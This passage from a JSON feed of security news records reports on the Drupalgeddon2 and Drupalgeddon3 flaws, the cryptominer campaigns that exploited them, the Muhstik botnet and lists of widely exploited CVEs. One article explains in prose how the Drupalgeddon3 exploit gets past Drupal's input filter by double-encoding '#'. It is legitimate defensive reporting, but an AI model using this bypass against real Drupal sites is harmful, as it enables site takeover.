"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-14T08:37:13", "id": "THN:B0F0C0035DAAFA1EC62F15464A80677E", "href": "https://thehackernews.com/2018/04/drupal-rce-exploit-code.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:35", "description": "[](<https://thehackernews.com/images/-nI78JCGBjaE/WuCp9Z3ptKI/AAAAAAAAwcQ/XnP5D9Is0Z4NbW1Yo0LuebQ2_RxM9oa9QCLcBGAs/s728-e100/drupal-patch-update.png>)\n\nDamn! You have to update your Drupal websites. \n \nYes, of course once again\u2014literally it's the third time in last 30 days. \n \nAs [notified](<https://www.drupal.org/psa-2018-003>) in advance two days back, Drupal has now released new versions of its software to patch yet another critical remote code execution (RCE) vulnerability, affecting its Drupal 7 and 8 core. \n \nDrupal is a popular open-source content management system software that powers millions of websites, and unfortunately, the CMS has been under active attacks since after the disclosure of a highly critical remote code execution vulnerability. \n \nThe new vulnerability was discovered while exploring the previously disclosed RCE vulnerability, dubbed **[Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>)** (CVE-2018-7600) that was patched on March 28, forcing the Drupal team to release this follow-up patch update. \n \nAccording to a new [advisory](<https://www.drupal.org/sa-core-2018-004>) released by the team, the new remote code execution vulnerability (CVE-2018-7602) could also allow attackers to take over vulnerable websites completely. 
\n \n\n\n### How to Patch Drupal Vulnerability\n\n[](<https://thehackernews.com/images/-zI_GNj80adw/WuC42gTf-5I/AAAAAAAAwcg/BiiIUAQK33MSqQwCkvfkyFi1l0BAq_wpACLcBGAs/s728-e100/drupal.png>)\n\n \nSince the previously disclosed flaw drew much attention and motivated attackers to target websites running Drupal, the company has urged all website administrators to install the new security patches as soon as possible. \n\n\n * If you are running 7.x, upgrade to Drupal 7.59.\n * If you are running 8.5.x, upgrade to Drupal 8.5.3.\n * If you are running 8.4.x, which is no longer supported, you first need to update your site to the 8.4.8 release and then install the latest 8.5.3 release as soon as possible.\nIt should also be noted that the new patches will only work if your site has already applied the patches for the Drupalgeddon2 flaw (i.e. it is already on the SA-CORE-2018-002 fixed releases). \n\n\n> \"We are not aware of any active exploits in the wild for the new vulnerability,\" a Drupal spokesperson told The Hacker News. \"Moreover, the new flaw is more complex to string together into an exploit.\"\n\nTechnical details of the flaw, which we might call **Drupalgeddon3**, have not been released in the advisory, but that does not mean you can wait until the next morning to update your website, believing it won't be attacked. \n \nWe have seen how attackers developed [automated exploits](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) leveraging the Drupalgeddon2 vulnerability to [inject cryptocurrency miners](<https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html>), backdoors, and other malware into websites within a few hours after its details went public. \n \nBesides these two flaws, the team also patched a moderately critical [cross-site scripting (XSS) vulnerability](<https://thehackernews.com/2018/04/drupal-site-vulnerability.html>) last week, which could have allowed remote attackers to pull off advanced attacks including cookie theft, keylogging, phishing and identity theft. 
\n \nTherefore, Drupal website admins are highly recommended to update their websites as soon as possible.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-25T16:41:00", "type": "thn", "title": "Third Critical Drupal Flaw Discovered\u2014Patch Your Sites Immediately", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-04-26T11:04:51", "id": "THN:8E5D44939B2B2FF0156F7FF2D4802857", "href": "https://thehackernews.com/2018/04/drupal-vulnerability-exploit.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:34", "description": "[](<https://thehackernews.com/images/-UXNjejbbqro/WuHDxyHAooI/AAAAAAAAwdM/yTGfiL9DknsnLaj9Z4dNy7xHoeZPrXinwCLcBGAs/s728-e100/drupal-hacking.png>)\n\nOnly a few hours after the Drupal team releases latest updates to fix a new remote code execution flaw in its content management system software, hackers have already started exploiting the vulnerability in the wild. 
\n \nAnnounced yesterday, the newly discovered vulnerability ([CVE-2018-7602](<https://thehackernews.com/2018/04/drupal-vulnerability-exploit.html>)) affects Drupal 7 and 8 core and allows remote attackers to achieve exactly what the previously discovered [Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) (CVE-2018-7600) flaw allowed\u2014complete takeover of affected websites. \n \nAlthough the Drupal team withheld technical details of the vulnerability to prevent immediate exploitation, two individual hackers revealed some details, along with a [proof-of-concept exploit](<https://pastebin.com/pRM8nmwj>), just a few hours after the patch release. \n \nIf you have been actively reading every latest story on The Hacker News, you must be aware of how the release of the [Drupalgeddon2 PoC exploit](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) drew much attention, which eventually allowed attackers to actively hijack websites and [spread cryptocurrency miners](<https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html>), backdoors, and other malware. \n \nAs expected, the Drupal team has warned that the new remote code execution flaw\u2014let's refer to it as **Drupalgeddon3**\u2014is now actively being exploited in the wild, again leaving millions of websites vulnerable to hackers. \n \nIn this article, I have summarized what this new flaw is all about and how attackers have been exploiting it to hack websites running unpatched versions of Drupal. \n\n\n[](<https://thehackernews.com/images/-aGyyaDhvYXI/WuHEwO_-DLI/AAAAAAAAwdU/brSU19-lJUkoC7LU-0YR1vh10h9gVLrLQCLcBGAs/s728-e100/drupal-exploit-code.png>)\n\n \nThe exploitation process for the Drupalgeddon3 flaw is somewhat similar to Drupalgeddon2, except that it requires a slightly different payload\u2014and, unlike Drupalgeddon2, an authenticated user account\u2014to trick vulnerable websites into executing the malicious payload on the victim's server. 
\n \nDrupalgeddon3 stems from improper input validation in the Form API, which is built on Drupal's \"renderable arrays\"\u2014the metadata structures that output most of the UI (user interface) elements in Drupal. These renderable arrays are a key-value structure in which the property keys start with a hash sign (#). \n \nA Twitter user with handle [@_dreadlocked](<https://twitter.com/_dreadlocked/status/989206562945273859>) explains that the flaw in the Form API can be triggered through the \"destination\" GET parameter of a URL that loads when a registered user initiates a request to delete a node, where a \"node\" is any piece of individual content, such as a page, article, forum topic, or a post. \n \nSince this \"destination\" GET query parameter also accepts another URL (as a value) with its own GET parameters, whose values were not sanitized, it allowed an authenticated attacker\u2014a registered user able to initiate that node-delete request\u2014to trick websites into executing the code. \n \nWhat I have understood from the PoC exploit released by another Twitter user, using handle [@Blaklis_](<https://twitter.com/Blaklis_/status/989229547030794241?s=08>), is that the unsanitized values pass through the stripDangerousValues() function, which filters out the \"#\" character, and that this filter can be bypassed by double URL-encoding the \"#\" character as \"%2523\". \n \nThe double encoding is what gets the value past the filter: \"%2523\" is subsequently decoded to \"%23\", which is the URL-encoded (percent-encoded) form of \"#\"\u2014not a Unicode escape\u2014and the resulting property is then processed to run arbitrary code on the system, such as a whoami utility. 
\n \nAt first, Drupal developers were skeptical about the possibility of real attacks using the Drupalgeddon3 vulnerability, but after the reports of in-the-wild attacks emerged, Drupal raised the level of danger of the problem to \"Highly critical.\" \n \nTherefore, all Drupal website administrators are highly recommended to update their websites to the latest versions of the software as soon as possible.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-26T12:32:00", "type": "thn", "title": "Release of PoC Exploit for New Drupal Flaw Once Again Puts Sites Under Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-04-26T12:32:45", "id": "THN:F8EDB5227B5DA0E4B49064C2972A193D", "href": "https://thehackernews.com/2018/04/drupalgeddon3-exploit-code.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:36", "description": "[](<https://thehackernews.com/images/-zMSVUp45Ep4/WtcTP9bdJsI/AAAAAAAAwTg/e-HDb99w0307p9aEkp1TPTePjTvSe7JRQCLcBGAs/s728-e100/drupalgeddon-exploit.png>)\n\nThe Drupal 
vulnerability (CVE-2018-7600), dubbed [Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) that could allow attackers to completely take over vulnerable websites has now been exploited in the wild to deliver malware backdoors and cryptocurrency miners. \n \nDrupalgeddon2, a highly critical remote code execution vulnerability discovered two weeks ago in Drupal content management system software, was recently patched by the company without releasing its technical details. \n \nHowever, just a day after security researchers at Check Point and Dofinity published complete details, a Drupalgeddon2 proof-of-concept (PoC) [exploit code](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) was made widely available, and large-scale Internet scanning and exploitation attempts followed. \n \nAt the time, no incident of targets being hacked was reported, but over the weekend, several security firms noticed that attackers have now started exploiting the vulnerability to install cryptocurrency miner and other malware on vulnerable websites. \n \nThe SANS Internet Storm Center [spotted](<https://isc.sans.edu/forums/diary/A+Review+of+Recent+Drupal+Attacks+CVE20187600/23563/>) some attacks to deliver a cryptocurrency miner, a PHP backdoor, and an IRC bot written in Perl. \n\n\n[](<https://thehackernews.com/images/-cgGXAVXKeKc/WtcOhdYr0iI/AAAAAAAAwTQ/gXhXTplYR4oUU-jDAmOdEpSV_ZIIDPweACLcBGAs/s728-e100/drupal-website-hacking.png>)\n\nThe simple PHP backdoor allows attackers to upload additional files (backdoors) to the targeted server. \n \nA thread on SANS ISC Infosec forums also [suggests](<https://isc.sans.edu/forums/diary/Drupal+CVE20187600+PoC+is+Public/23549/>) that Drupalgeddon2 is being used to install the XMRig Monero miner on vulnerable websites. Besides the actual XMRig miner, the malicious script also downloads additional files, including a script to kill competing miners on the targeted system. 
\n \nResearchers from security firm Volexity have also [observed](<https://www.volexity.com/blog/2018/04/16/drupalgeddon-2-profiting-from-mass-exploitation/>) a wide variety of actions and payloads attempted via the public exploit for Drupalgeddon2 to deliver malicious scripts that install backdoors and cryptocurrency miners on the vulnerable sites. \n \nThe researchers believed that one of the Monero miner campaigns, delivering XMRig, is associated with a criminal group that exploited the vulnerability (CVE-2017-10271) in Oracle WebLogic servers to deliver cryptocurrency miner malware shortly after its PoC exploit code was made public in late 2017. \n\n\n[](<https://thehackernews.com/images/-cWUncg7VBfo/WtcN9yL7mTI/AAAAAAAAwTI/--A-g7ptWeIueY8TO5tvLWL1aijI9OAjgCLcBGAs/s728-e100/drupal-hacking.png>)\n\nVolexity identified some of the group's wallets that had stored a total of 544.74 XMR (Monero coin), which is equivalent to almost $105,567. \n \nAs we reported in our previous article, Imperva stats [showed](<https://www.imperva.com/blog/2018/04/drupalgeddon-2-0-are-hackers-slacking-off/>) that 90% of the Drupalgeddon2 attacks are simply IP scanning in an attempt to find vulnerable systems, 3% are backdoor infection attempts, and 2% are attempting to run crypto miners on the targets. \n \nFor those unaware, Drupalgeddon2 allows an unauthenticated, remote attacker to execute malicious code on default or common Drupal installations under the privileges of the user, affecting all versions of Drupal from 6 to 8. \n \nTherefore, site admins were highly recommended to patch the issue by updating their CMS to Drupal 7.58 or Drupal 8.5.1 as soon as possible. 
\n\n\n> In its advisory, Drupal [warned](<https://www.drupal.org/psa-2018-002>) that \"sites not patched by Wednesday, 2018-04-11 may be compromised\" and \"simply updating Drupal will not remove backdoors or fix compromised sites.\"\n\nMoreover, \n\n\n> \"If you find that your site is already patched, but you didn't do it, that can be a symptom that the site was compromised. Some attacks in the past have applied the patch as a way to guarantee that only that attacker is in control of the site.\"\n\nHere's a guide the Drupal team suggests following [if your website has been hacked](<https://www.drupal.org/node/2365547>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-18T09:49:00", "type": "thn", "title": "Hackers Exploiting Drupal Vulnerability to Inject Cryptocurrency Miners", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271", "CVE-2018-7600"], "modified": "2018-04-18T09:50:03", "id": "THN:F03064A70C65D9BD62A8F5898BA276D2", "href": "https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2022-05-09T12:37:25", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh09KugWf9Nll7KSG7yZBNIvMLXvLKZ92heAygg8X6PYa2oq5Gp7OARqFBSZyMbfZCsrcK9Mh72AhpOgxuEXhmjAynK6iRSEf_xMMAl_T0oqulTMyMrJgAc7PDPFVO0MuKFWRJessc_Iu5-Rm-QSXVXRVTrU_666K232IVvIKEiChh39TVtKy5BnyQY/s728-e100/redis.jpg>)\n\nMuhstik, a botnet infamous for propagating via web application exploits, has been observed targeting Redis servers using a recently disclosed vulnerability in the database system.\n\nThe vulnerability relates to [CVE-2022-0543](<https://nvd.nist.gov/vuln/detail/CVE-2022-0543>), a [Lua sandbox escape flaw](<https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce>) in the open-source, in-memory, key-value data store that could be abused to achieve remote code execution on the underlying machine. The vulnerability is rated 10 out of 10 for severity.\n\n\"Due to a packaging issue, a remote attacker with the ability to execute arbitrary Lua scripts could possibly escape the Lua sandbox and execute arbitrary code on the host,\" Ubuntu noted in an advisory released last month.\n\nAccording to [telemetry data](<https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers>) gathered by Juniper Threat Labs, the attacks leveraging the new flaw are said to have commenced on March 11, 2022, leading to the retrieval of a malicious shell script (\"russia.sh\") from a remote server, which is then utilized to fetch and execute the botnet binaries from another server.\n\nFirst [documented](<https://blog.netlab.360.com/gpon-exploit-in-the-wild-i-muhstik-botnet-among-others-en/>) by Chinese security firm Netlab 360, Muhstik is known to be [active](<https://www.lacework.com/blog/meet-muhstik-iot-botnet-infecting-cloud-servers/>) since March 2018 and is monetized for carrying out coin mining activities and staging distributed denial-of-service (DDoS) attacks.\n\nCapable of self-propagating on Linux and IoT devices like GPON home router, DD-WRT router, and 
[Tomato routers](<https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/>), Muhstik has been spotted weaponizing a number of flaws over the years \u2013\n\n * [**CVE-2017-10271**](<https://nvd.nist.gov/vuln/detail/cve-2017-10271>) (CVSS score: 7.5) \u2013 An input validation vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) \u2013 Drupal remote code execution vulnerability\n * [**CVE-2019-2725**](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) (CVSS score: 9.8) \u2013 Oracle WebLogic Server remote code execution vulnerability\n * [**CVE-2021-26084**](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) (CVSS score: 9.8) \u2013 An OGNL (Object-Graph Navigation Language) injection flaw in Atlassian Confluence, and\n * [**CVE-2021-44228**](<https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html>) (CVSS score: 10.0) \u2013 Apache Log4j remote code execution vulnerability (aka Log4Shell)\n\n\"This bot connects to an IRC server to receive commands which include the following: download files, shell commands, flood attacks, [and] SSH brute force,\" Juniper Threat Labs researchers said in a report published last week.\n\nIn light of active exploitation of the critical security flaw, users are highly recommended to move quickly to patch their Redis services to the latest version.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-28T06:59:00", "type": "thn", "title": "Muhstik Botnet Targeting Redis Servers Using Recently Disclosed Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271", "CVE-2018-7600", "CVE-2019-2725", "CVE-2021-26084", "CVE-2021-44228", "CVE-2022-0543"], "modified": "2022-03-28T06:59:18", "id": "THN:4DE731C9D113C3993C96A773C079023F", "href": "https://thehackernews.com/2022/03/muhstik-botnet-targeting-redis-servers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:24", "description": "[](<https://thehackernews.com/images/-mNDlC0tKMKU/YSOiCQjKsfI/AAAAAAAADm0/8vxg1C4GweIrljnlPQrCj0yPLMYs18y_ACLcBGAsYHQ/s0/linux.jpg>)\n\nClose to 14 million Linux-based systems are directly exposed to the Internet, making them a lucrative target for an array of 
real-world attacks that could result in the deployment of malicious web shells, coin miners, ransomware, and other trojans.\n\nThat's according to an in-depth look at the Linux threat landscape published by U.S.-Japanese cybersecurity firm [Trend Micro](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/linux-threat-report-2021-1h-linux-threats-in-the-cloud-and-security-recommendations>), detailing the top threats and vulnerabilities affecting the operating system in the first half of 2021, based on data amassed from honeypots, sensors, and anonymized telemetry.\n\nThe company, which detected nearly 15 million malware events aimed at Linux-based cloud environments, found coin miners and ransomware to make up 54% of all malware, with web shells accounting for a 29% share.\n\nIn addition, by dissecting over 50 million events reported from 100,000 unique Linux hosts during the same time period, the researchers found 15 different security weaknesses that are known to be actively exploited in the wild or have a proof of concept (PoC) \u2014\n\n * [**CVE-2017-5638**](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>) (CVSS score: 10.0) - Apache Struts 2 remote code execution (RCE) vulnerability\n * [**CVE-2017-9805**](<https://nvd.nist.gov/vuln/detail/CVE-2017-9805>) (CVSS score: 8.1) - Apache Struts 2 REST plugin XStream RCE vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal Core RCE vulnerability\n * [**CVE-2020-14750**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14750>) (CVSS score: 9.8) - Oracle WebLogic Server RCE vulnerability\n * [**CVE-2020-25213**](<https://nvd.nist.gov/vuln/detail/CVE-2020-25213>) (CVSS score: 10.0) - WordPress File Manager (wp-file-manager) plugin RCE vulnerability\n * [**CVE-2020-17496**](<https://nvd.nist.gov/vuln/detail/CVE-2020-17496>) (CVSS score: 9.8) - vBulletin 'subwidgetConfig' unauthenticated RCE vulnerability\n * 
[**CVE-2020-11651**](<https://nvd.nist.gov/vuln/detail/CVE-2020-11651>) (CVSS score: 9.8) - SaltStack Salt authorization weakness vulnerability\n * [**CVE-2017-12611**](<https://nvd.nist.gov/vuln/detail/CVE-2017-12611>) (CVSS score: 9.8) - Apache Struts OGNL expression RCE vulnerability\n * [**CVE-2017-7657**](<https://nvd.nist.gov/vuln/detail/CVE-2017-7657>) (CVSS score: 9.8) - Eclipse Jetty chunk length parsing integer overflow vulnerability\n * [**CVE-2021-29441**](<https://nvd.nist.gov/vuln/detail/CVE-2021-29441>) (CVSS score: 9.8) - Alibaba Nacos AuthFilter authentication bypass vulnerability\n * [**CVE-2020-14179**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14179>) (CVSS score: 5.3) - Atlassian Jira information disclosure vulnerability \n * [**CVE-2013-4547**](<https://nvd.nist.gov/vuln/detail/CVE-2013-4547>) (CVSS score: 8.0) - Nginx crafted URI string handling access restriction bypass vulnerability\n * [**CVE-2019-0230**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0230>) (CVSS score: 9.8) - Apache Struts 2 RCE vulnerability\n * [**CVE-2018-11776**](<https://nvd.nist.gov/vuln/detail/CVE-2018-11776>) (CVSS score: 8.1) - Apache Struts OGNL expression RCE vulnerability\n * [**CVE-2020-7961**](<https://nvd.nist.gov/vuln/detail/CVE-2020-7961>) (CVSS score: 9.8) - Liferay Portal untrusted deserialization vulnerability\n\n[](<https://thehackernews.com/images/-CcxYro041Ss/YSOhRgK85gI/AAAAAAAADmo/EddtTNpqRVsnxWJ2QLdym3CSkEJDwcSggCLcBGAsYHQ/s0/report-1.jpg>)\n\n[](<https://thehackernews.com/images/-p0iNN7yORLk/YSOhRABhMqI/AAAAAAAADmk/RQED6fXWrDkadRhDxqU0JzZOoWwJePPkQCLcBGAsYHQ/s0/report-.jpg>)\n\nEven more troublingly, the 15 most commonly used Docker images on the official Docker Hub repository has been revealed to harbor hundreds of vulnerabilities spanning across python, node, wordpress, golang, nginx, postgres, influxdb, httpd, mysql, debian, memcached, redis, mongo, centos, and rabbitmq, underscoring the need to [secure 
containers](<https://www.trendmicro.com/vinfo/us/security/news/security-technology/container-security-examining-potential-threats-to-the-container-environment>) from a wide range of potential threats at each stage of the development pipeline.\n\n\"Users and organizations should always apply security best practices, which include utilizing the security by design approach, deploying multilayered virtual patching or vulnerability shielding, employing the principle of least privilege, and adhering to the shared responsibility model,\" the researchers concluded.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-23T13:27:00", "type": "thn", "title": "Top 15 Vulnerabilities Attackers Exploited Millions of Times to Hack Linux Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4547", "CVE-2017-12611", "CVE-2017-5638", "CVE-2017-7657", 
"CVE-2017-9805", "CVE-2018-11776", "CVE-2018-7600", "CVE-2019-0230", "CVE-2020-11651", "CVE-2020-14179", "CVE-2020-14750", "CVE-2020-17496", "CVE-2020-25213", "CVE-2020-7961", "CVE-2021-29441"], "modified": "2021-08-23T13:27:54", "id": "THN:7FD924637D99697D78D53283817508DA", "href": "https://thehackernews.com/2021/08/top-15-vulnerabilities-attackers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:17", "description": "[](<https://thehackernews.com/images/-_sUoUckANJU/YQJlBsicySI/AAAAAAAADX0/BEDLvJhwqzYImk1o5ewZhnKeXxnoL0D0wCLcBGAsYHQ/s0/Security-Vulnerabilities.jpg>)\n\nIntelligence agencies in Australia, the U.K., and the U.S. issued a joint advisory on Wednesday detailing the most exploited vulnerabilities in 2020 and 2021, once again demonstrating how threat actors are able to swiftly weaponize publicly disclosed flaws to their advantage.\n\n\"Cyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\" the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom's National Cyber Security Centre (NCSC), and the U.S. 
Federal Bureau of Investigation (FBI) [noted](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>).\n\n\"However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\"\n\nThe top 30 vulnerabilities span a wide range of software, including remote work, virtual private networks (VPNs), and cloud-based technologies, that cover a broad spectrum of products from Microsoft, VMware, Pulse Secure, Fortinet, Accellion, Citrix, F5 Big IP, Atlassian, and Drupal.\n\nThe most routinely exploited flaws in 2020 are as follows -\n\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (CVSS score: 9.8) - Citrix Application Delivery Controller (ADC) and Gateway directory traversal vulnerability\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (CVSS score: 10.0) - Pulse Connect Secure arbitrary file reading vulnerability\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - Fortinet FortiOS path traversal vulnerability leading to system file leak\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (CVSS score: 9.8) - F5 BIG-IP remote code execution vulnerability\n * [**CVE-2020-15505**](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) (CVSS score: 9.8) - MobileIron Core & Connector remote code execution vulnerability\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) - Microsoft Exchange memory corruption vulnerability\n * [**CVE-2019-3396**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) (CVSS score: 9.8) - Atlassian Confluence Server remote code execution vulnerability\n * [**CVE-2017-11882**](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) (CVSS score: 7.8) - Microsoft Office memory corruption vulnerability\n * [**CVE-2019-11580**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) (CVSS score: 
